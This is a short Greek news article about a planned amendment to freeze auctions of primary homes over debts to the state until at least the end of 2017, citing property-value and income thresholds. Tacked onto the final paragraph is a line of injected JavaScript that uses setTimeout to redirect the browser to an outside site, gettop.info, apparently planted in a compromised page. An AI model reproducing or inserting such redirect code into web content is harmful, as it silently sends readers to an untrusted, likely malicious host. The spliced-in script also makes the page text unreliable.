Τροπολογία για «πάγωμα» πλειστηριασμών α’ κατοικίας για χρέη προς το Δημόσιο

0
7

 

Στο πάγωμα των πλειστηριασμών α’ κατοικίας για χρέη προς το Δημόσιο, τουλάχιστον έως το τέλος του 2017, προτίθεται να προχωρήσει η κυβέρνηση.

Σύμφωνα με πληροφορίες, σε τροπολογία που αναμένεται να κατατεθεί στη Βουλή άμεσα θα περιλαμβάνεται σχετική ρύθμιση, με στόχο να εναρμονισθεί η νομοθεσία για τους πλειστηριασμούς ακινήτων για τα χρέη προς το Δημόσιο με αυτήν που ισχύει για τα χρέη από δάνεια στις τράπεζες και η οποία προστατεύει την πρώτη κατοικία με βάση συγκεκριμένα εισοδηματικά και άλλα κριτήρια.

Με αυτόν τον τρόπο εκτιμάται ότι θα αντιμετωπισθεί η διαφορετική αντιμετώπιση ανάμεσα στους οφειλέτες των τραπεζών και αυτών που έχουν οφειλές προς το Δημόσιο για τους οποίους δεν προβλέπεται καθεστώς προστασίας α’ κατοικίας από τους πλειστηριασμούς.

Το κυβερνητικό σχέδιο έχει ως πιλότο τα όρια προστασία της πρώτης κατοικίας που ισχύουν σήμερα για τα χρέη προ τις τράπεζες.

Αυτά προβλέπουν προστασία α’ κατοικίας από πλειστηριασμούς για ακίνητα αντικειμενικής αξίας έως 180.000 ευρώ για άγαμους και έγγαμους, όριο που προσαυξάνεται κατά 20.000 ευρώ για κάθε παιδί έως και το τρίτο. Επίσης ισχύει και εισοδηματικό όριο το οποίο εντάσσει στο καθεστώς προστασίας άγαμους με εισόδημα έως 13.900 ευρώ και έγγαμους με εισόδημα έως 23.600 ευρώ με προσαύξηση 5.700 ευρώ για όσους έχουν ως τρία παιδιά. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here